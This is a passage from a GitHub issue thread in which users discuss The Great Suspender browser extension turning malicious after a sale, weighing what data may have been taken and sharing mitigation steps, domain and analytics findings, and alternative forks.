/> The problem is that it is a regulation "against" companies, enterprises or any commercial entity... No person can be hold liable on data exposure using this regulation...</p> </blockquote> <p>That is total BS. I gave another example of German law. Every normal country has a law like that. Any publish of personal data is a crime, even if I go outside on the street and publish personal data by someone like name street ect and is like "this person is a criminal". That is a crime.</p> </blockquote> <p>LOL. If I post that his name is Dean Oemcke are the Internet Police gonna come after me?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2007008?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dismantl picture"> <strong>dismantl</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Hehe ...<br /> no you gave a link to partial explanation of the GDP regulation that all EU countries had implemented as local law a couple of years ago...<br /> And believe me I know what I am talking about.. even there are times I hate i have to work with these regulations :P</p> <p>Anyway, no need to be aggressive and use words like "BS" etc...<br /> I am not an enemy here...<br /> I just stated some facts ;)</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/870612?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="PhobosK picture"> <strong>PhobosK</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <blockquote> <blockquote> <p>Yeah I thought you would pull GDPR out of your sleeve ;)<br /> The problem is that it is a regulation "against" companies, enterprises or any commercial entity... No person can be hold liable on data exposure using this regulation...</p> </blockquote> <p>That is total BS. I gave another example of German law. Every normal country has a law like that. Any publish of personal data is a crime, even if I go outside on the street and publish personal data by someone like name street ect and is like "this person is a criminal". That is a crime.</p> </blockquote> <p>LOL</p> </blockquote> <p>You seem to live in the USA, which is not a normal country. Doesnt surprise me, that you cant understand basic reasoning and what is right and what is wrong.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Hehe ...<br /> no you gave a link to partial explanation of the GDP regulation that all EU countries had implemented as local law a couple of years ago...</p> </blockquote> <p>Then learn to read.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/6721083?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="makedir picture"> <strong>makedir</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 😄<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I'll be waiting for the Internet Police to come knocking down my door <strong>@makedir</strong>, thanks for the lesson in law 🤣 TIL that posting someone's name on the internet is a crime.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/2007008?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dismantl picture"> <strong>dismantl</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👎<span class="ml-2 mr-3">2</span> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Can you please all shut up? I subscribed to this issue to get relevant security notifications about this issue, not for some pseudo-legal bullshit or other semi-related discussions. Thanks.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/14054505?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="piegamesde picture"> <strong>piegamesde</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">13</span> 😄<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Guys, please. It's irrelevant to act as the internet police. If the guy wanted to reveal its source he would've by now. Chances are he doesn't even really know who it was due to payment in bitcoin and discard email address. There's a chance however he <em>is</em> liable by law due to lack of due diligence - i.e, having reasons to suspect of foul play and failing to report or prevent it. This, however, is probably grey area for the law - much more internationally - especially when it's unclear what's the extent of damages he and the malicious buyer caused. Best to assume all the worse that could happen happened, mitigate our losses as quickly as possible to reduce the value of whatever was done or collected and collectively pressure companies such as Google for better policing mechanisms to prevent this from happening.<br /> As long as this vector of attack is viable even most well intentioned developers can be swayed with a big enough sum to look at the other way.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3511099?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="tcvv picture"> <strong>tcvv</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I think the first step would be to appeal to github to restore the repo to the community, so it can be cleaned up, have a proper disclaimer right at the front page and then archived for future reference. Let TGS live through its forks and learn from this. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3511099?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="tcvv picture"> <strong>tcvv</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I just reported the current owner of the repo - greatsuspender - citing this incident. Notice that his account is a PRO account. This means there was a payment to Github, and, therefore, Github should have transactional data related to it. Since only Credit Card or Paypal is accepted here AFAIK, those should be trackable by authorities. If this user acted with intent of serving malware then I'm sure that is something proper authorities can look into.</p> <p>I urge everyone to do similar reports to github.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3511099?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="tcvv picture"> <strong>tcvv</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">8</span> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>This is disturbing as I have the malware version apparently for few months without realizing it until Chrome disabled it. I can't quite tell what the damage is though, is it primarily limited to injecting ads or is there something more? </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/423908?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="whataboutbob picture"> <strong>whataboutbob</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@whataboutbob</strong> Seems the worst danger is that it could have sent keystrokes, webpages you saw, and cookies to the author.</p> <p>Best you can do to mitigate it is: backup your session/tabs data, remove the extension, restore your backup data, install a non-malicious version or fork, log out of all webpages you are logged into, and delete all your cookies.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> 👎<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>@luke-jr good advice, thanks. I have already uninstalled the extension and not concerned with the lost tabs, deleting all cookies is my next step. Thanks for the good work, everyone. </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/423908?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="whataboutbob picture"> <strong>whataboutbob</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@whataboutbob</strong> Seems the worst danger is that it could have sent keystrokes, webpages you saw, and cookies to the author.</p> </blockquote> <p>From <strong>@TheMageKing</strong> explanation no keystrokes could be logged since the event handler would run on a page that mostly inaccessible to user and the only place it could occur is in code that is local to the extension, not remote.</p> <p>Everything else was fair game since the updates added permission for webrequest inspection so cookies and even personal data submitted or receive could have been intercepted and logged, not only modified to include ads</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3511099?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="tcvv picture"> <strong>tcvv</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>That wouldn't really change anything. The Chrome store version deviated<br /> from the github code already and that was part of the problem. The Chrome<br /> web store integration would also need to be modified so only github would<br /> be able to push to it.</p> <p>On Sat, Feb 6, 2021 at 12:13 PM Tiago Valente <a rel="nofollow noopener" target="_blank" href="mailto:notifications@github.com">notifications@github.com</a><br /> wrote:</p> <blockquote> <p>I think the first step would be to appeal to github to restore the repo to<br /> the community, so it can be cleaned up, have a proper disclaimer right at<br /> the front page and then archived for future reference. Let TGS live through<br /> its forks and learn from this.</p> <p>—<br /> You are receiving this because you commented.<br /> Reply to this email directly, view it on GitHub<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-774509312">https://github.com/greatsuspender/thegreatsuspender/issues/1263#issuecomment-774509312</a>,<br /> or unsubscribe<br /> <a rel="nofollow noopener" target="_blank" href="https://github.com/notifications/unsubscribe-auth/ABJAKBPXJ3X5JLYB4KYUWYDS5V2DLANCNFSM4TI37TGQ">https://github.com/notifications/unsubscribe-auth/ABJAKBPXJ3X5JLYB4KYUWYDS5V2DLANCNFSM4TI37TGQ</a><br /> .</p> </blockquote> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/5375237?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="cowbert picture"> <strong>cowbert</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>That wouldn't really change anything. The Chrome store version deviated from the github code already and that was part of the problem. The Chrome web store integration would also need to be modified so only github would be able to push to it.</p> </blockquote> <p>I know the sources diverged and the malicious code itself is not even hosted here. However, primary source of discussion, investigation and forking is still this repo that the malicious maintainer still owns. At any point he could delete everything. Plus his github account might have information valuable for investigation from authorities.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/3511099?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="tcvv picture"> <strong>tcvv</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>DON'T delete your cookies until AFTER you logout. The point of logging out is to invalidate those cookies, and you can't invalidate them without using them</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 6 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>@luke-jr Anything that can be done if I cleared my cookies already? Or am I just crossing my fingers now then? Important passwords were already changed by this point too.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/78667182?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="sentient-toasters picture"> <strong>sentient-toasters</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>I'd like to point out a few oddities and interesting bits I came across while gathering OSINT these past 24 hours. Perhaps some of this info was already known beforehand, so apologies in advance for polluting your notification box.</p> <p>The Google Analytics tracking ID <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/commit/b8b7fdf1ff54b566a472b7ead42f71f4958c4b85#diff-21ccebd57ed886d3632d5a4ac11c5a264133a299d9db6a108dfc7b1b1827b181">has changed</a> while the project was under the original author's control (May 23rd, 2020) a month before the sale was announced (June 19th). The most recent ID was still embedded up until version 7.1.8, including in the <a rel="nofollow noopener" target="_blank" href="https://robwu.nl/crxviewer/crxviewer.html?crx=https%3A%2F%2Fwww.crx4chrome.com%2Fgo.php%3Fp%3D221789%26s%3D0%26l%3Dhttps%253A%252F%252Fclients2.googleusercontent.com%252Fcrx%252Fblobs%252FQgAAAC6zw0qH2DJtnXe8Z7rUJP0w4lDJ_bL6-4cEiO2dNd4wrSGFFOdFphokRztdPsQowUaOdWUtinT5tZeRv1Vf900oTts08327-tk8a_WqaBFZAMZSmuXCYMppUJZfV9giRXbSZIQVQDpezA%252Fextension_7_1_8_0.crx&q=gs&qf=js%2FgsAnalytics.js&qb=1">Chrome Web Store package</a> (line 27). Coincidentally, the last tagged release (7.1.6) was also on the 23rd of May.</p> <p>This means the original author gave analytics data to the buyer way before a sale was announced and finalized. Note that anyone who is currently running TGS 7.1.6 from the repo and compiled the extension without opting out or removing the Google Analytics code is probably still sending data to the malicious owner.</p> <p>Two of the nefarious domains in question (trckingbyte.com & trckpath.com) have been registered since February 21st, 2019, meaning these domains were most likely used for other projects before added into TGS. In fact, the former has been <a rel="nofollow noopener" target="_blank" href="https://www.reddit.com/r/chrome/comments/gg2nii/auto_refresh_extension_now_malware/">documented to include malware</a> in another malicious extension called "Auto Refresh [Premium|Plus]" over 9 months ago. There's a lot of good info in the Reddit thread; most users were complaining about ads being injected or tabs redirecting to adult & dating sites.</p> <p>I've unearthed <a rel="nofollow noopener" target="_blank" href="https://gist.github.com/sarog/6864f19ad0609e60e30d87ca0429fba6">the full list of malicious domains</a> that are most likely owned by the new owner. Some of these have been registered since 2018 and are still active. Clearly, whoever took over TGS has done this before with other extensions.</p> <p>A quick search of the domains in question reveal some interesting info, including a <a rel="nofollow noopener" target="_blank" href="https://app.any.run/tasks/5d75d8c2-91fc-45f1-b3ef-3c4d09ffdd57/">AnyRun execution</a> on June 17th, 2020, just 2 days before the sale was announced. There's also <a rel="nofollow noopener" target="_blank" href="https://app.any.run/tasks/e19ed044-ddc2-4d01-80c3-35144c5613cb/">another AnyRun execution</a> on July 2nd, 2020. It's possible a paranoid individual simply ran these tasks to see if the URLs were safe, or more likely the malicious owner wanted to confirm the domains were not blacklisted before finalizing the purchase.</p> <p>Speaking of domains, thegreatsuspender.com is still registered and has active MX records pointing to privateemail.com. According to an online "WHOIS history" sample report, the domain was updated on June 18th, 2020 and August 12th, 2020, possibly transferred or NS records were updated.</p> <p>The original author has been called out at least once for <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/issues/202">increasing the amount of tracking performed</a> in the code, back on May 23rd, 2018. The pull request that allowed the user to opt out of the tracking was <a rel="nofollow noopener" target="_blank" href="https://github.com/greatsuspender/thegreatsuspender/pull/1239">only merged</a> on October 18, 2020. Now before everyone jumps the gun, I've only shared this tidbit to highlight the following: it's the only time the <strong>new</strong> owner has typed anything on here.</p> <p>Finally, why is the <a rel="nofollow noopener" target="_blank" href="https://microsoftedge.microsoft.com/addons/detail/the-great-suspender/engadpfihlijamplpleppgjofcmemdfe">extension still available</a> on Microsoft's store?</p> <p>At this point, if users are still questioning whether this extension is malicious or not, I'll simply say this: we'd be doing everyone a great disservice by not dropping the word "probably" from the title of this issue.</p> <p>I have a few more findings to disclose after I confirm their validity, but enough for now.</p> <p><strong>@deanoemcke</strong> Do the right thing. C'est un petit monde, après tout.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1860472?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="sarog picture"> <strong>sarog</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">17</span> 🚀<span class="ml-2 mr-3">7</span> 👀<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@whataboutbob</strong> Seems the worst danger is that it could have sent keystrokes, webpages you saw, and cookies to the author.</p> <p>Best you can do to mitigate it is: backup your session/tabs data, remove the extension, restore your backup data, install a non-malicious version or fork, log out of all webpages you are logged into, and delete all your cookies.</p> </blockquote> <p>easy ... "log out of all webpages you are logged into"</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/61627500?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="insideNIMA picture"> <strong>insideNIMA</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@insideNIMA</strong> easy for you to assume a solution. What happens if my private key for a crypto web wallet was compromised? Now you have to pay transaction fees to move to a new wallet. Not everything is as simple as changing a password.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/9877150?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Technetium1 picture"> <strong>Technetium1</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Another simple solution for restoring broken tabs in a form of <a rel="nofollow noopener" target="_blank" href="http://great-suspender-restore-urls.herokuapp.com/ui/index.html">online service</a>. Read the <a rel="nofollow noopener" target="_blank" href="http://great-suspender-restore-urls.herokuapp.com/ui/about.html">instructions</a>.</p> <p>Build with FastAPI, VueJS and the <a rel="nofollow noopener" target="_blank" href="https://github.com/barseghyanartur/the-great-suspender-restore-urls">the-great-suspender-restore-urls</a> Python package.</p> <p>Source code <a rel="nofollow noopener" target="_blank" href="https://github.com/barseghyanartur/the-great-suspender-restore-urls-service">available</a>.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/4925587?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="barseghyanartur picture"> <strong>barseghyanartur</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">2</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>@luke-jr Anything that can be done if I cleared my cookies already? Or am I just crossing my fingers now then? Important passwords were already changed by this point too.</p> </blockquote> <p>Some sites invalidate old sessions when you change password (I would think), but others might not.</p> <p>If it's very important, it might be worth restoring a backup with the cookies.</p> <blockquote> <p>Note that anyone who is currently running TGS 7.1.6 from the repo and compiled the extension without opting out or removing the Google Analytics code is probably still sending data to the malicious owner.</p> </blockquote> <p>Nothing too concerning, though, right? Just usage patterns of the extension itself?</p> <blockquote> <p>easy ... "log out of all webpages you are logged into"</p> </blockquote> <p>Scroll through your cookie list to see which websites that could be. :)</p> <blockquote> <p>What happens if my private key for a crypto web wallet was compromised?</p> </blockquote> <p>Well, that's your own fault. Never put private keys into a browser, nor use a web wallet for anything more than a gateway to fiat (ie, about to sell / just bought). Anything else is begging to lose it.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/1095675?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="luke-jr picture"> <strong>luke-jr</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Well, that's your own fault. Never put private keys into a browser, nor use a web wallet for anything more than a gateway to fiat (ie, about to sell / just bought). Anything else is begging to lose it.</p> </blockquote> <p>@luke-jr this is indeed part of the inherent risk of web-wallets. I'm not personally concerned about this, but others may not fully understand all the implications and should be made aware.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/9877150?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Technetium1 picture"> <strong>Technetium1</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>What do you think of the modified extension by @aciidic? <a rel="nofollow noopener" target="_blank" href="https://github.com/aciidic/thegreatsuspender-notrack">This one</a></p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/37818605?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="inbroso picture"> <strong>inbroso</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Thank you <strong>@TheMageKing</strong> and everyone supplying helpful info! Idk when / if this can be answered but was the data stolen isolated to the browser window(s) with the extension installed? Could anything be intercepted from another simultaneously open window, like a different Chrome user profile (without the extension) or a separate app (e.g. Microsoft Teams)?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/70635542?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="pituchi picture"> <strong>pituchi</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@sarog</strong> I think Microsoft should be notified about this malicious code within the extension and I hope they can verify it<br /> <strong>@barseghyanartur</strong> about the forked extension you mentioned, you mentioned that TGS also supported Firefox before and I don't know about that. Is that so?</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/29157187?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dtantono picture"> <strong>dtantono</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>You can try "The Marvellous Suspender" which is also a good fork and available on the Chrome Web Store but don't know about Firefox</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/70191184?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="DestroyerXyz picture"> <strong>DestroyerXyz</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p>Thank you <strong>@TheMageKing</strong> and everyone supplying helpful info! Idk when / if this can be answered but was the data stolen isolated to the browser window(s) with the extension installed? Could anything be intercepted from another simultaneously open window, like a different Chrome user profile (without the extension) or a separate app (e.g. Microsoft Teams)?</p> </blockquote> <p>No, it cannot because everything in Chrome is sandboxed and an extension can't even access seperate tab without permission but TGS has permission to all tabs but still can't access other profiles and apps</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/70191184?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="DestroyerXyz picture"> <strong>DestroyerXyz</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">3</span> ❤<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@TheMageKing</strong> any ideas about access the plug-in had on other extension like lastpass?</p> <p>Looking forward to rotating 400+ passwords upsets me a bit, but a good practice tho </p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/42982533?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="MartinWie picture"> <strong>MartinWie</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> 👀<span class="ml-2 mr-3">1</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>The extension can still be installed on Edge but it gets automatically disabled after a few minutes with a message that it contains malware. So, the Edge edition is not a big worry IMHO.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/10689737?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="kashmirix picture"> <strong>kashmirix</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@MartinWie</strong> since lastpass is not open source which is quite different from bitwarden. I think you should back it up for safety measures.<br /> <strong>@kashmirix</strong> it is better to let Microsoft know about this problem to prevent unfortunate victims</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/29157187?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="dtantono picture"> <strong>dtantono</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@dtantono</strong> thx for the fast response, but my concern was not in Google removing Lastpass/loss of these passwords(a backup is in my normal backup strategy) but in potential leaked data from the lastpass chrome plug-in. / TGS accessing this data</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/42982533?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="MartinWie picture"> <strong>MartinWie</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p><strong>@dtantono</strong>:</p> <blockquote> <p><strong>@kashmirix</strong> it is better to let Microsoft know about this problem to prevent unfortunate victims</p> </blockquote> <p>I have done just that.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/10689737?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="kashmirix picture"> <strong>kashmirix</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <blockquote> <p><strong>@TheMageKing</strong> any ideas about access the plug-in had on other extension like lastpass?<br /> Looking forward to rotating 400+ passwords upsets me a bit, but a good practice tho</p> </blockquote> <p><strong>@MartinWie</strong> Lastpass <em>itself</em> will not be affected as explained by DestroyerXyz above, however, if you used it to login there's a chance that the login process could have exposed a password. Best to just rotate everything and call it good.</p> <blockquote> <p>You can try "The Marvellous Suspender" which is also a good fork and available on the Chrome Web Store but don't know about Firefox</p> </blockquote> <p>FF extension may be available in the future... See here <a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender/issues/18">https://github.com/gioxx/MarvellousSuspender/issues/18</a></p> <blockquote> <p>What do you think of the modified extension by @aciidic? This one</p> </blockquote> <p>I like it and I use it right now. I will switch to <a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender">https://github.com/gioxx/MarvellousSuspender</a> once <a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender/issues/12">https://github.com/gioxx/MarvellousSuspender/issues/12</a> and <a rel="nofollow noopener" target="_blank" href="https://github.com/gioxx/MarvellousSuspender/issues/23">https://github.com/gioxx/MarvellousSuspender/issues/23</a> are solved, as I have reviewed <em>literally all</em> of the code. Just to be clear, the code that is mentioned in issue 12 was long ago neutered, it's just leftovers.</p> </div> <div class="card-footer"> <div class="row"> <div class="col"> <img src="https://avatars.githubusercontent.com/u/9877150?v=4&s=40" style="width:20px; height:20px;" class="mr-2 rounded float-left" alt="Technetium1 picture"> <strong>Technetium1</strong> <span class="text-muted ml-1">on 7 Feb 2021</span> </div> <div class="col text-right"> 👍<span class="ml-2 mr-3">4</span> </div> </div> </div> </div> <div class="card card-custom mb-4"> <div class="card-body pt-3 pb-3 markdown"> <p>Seriously... regardless of whether or not the fork contains the harmful code... after what happened, the permissions opened up by this extension alone should be reason to not utilize a fork, until the code is rewritten. </p> <p>Installing any fork of this off the chrome store opens up the exact same issues (updates are automatically pushed to devices and you likely will not have the huge community base to even DISCOVER that the code contains any malware. </p> <p>If this extension wasn't utilized by over 2M users, the issue likely would never have been exposed... </p> <p>As soon as Manifest V3 is required (in one of the next few chrome releases) all forks will cease to work anyway as the API's the 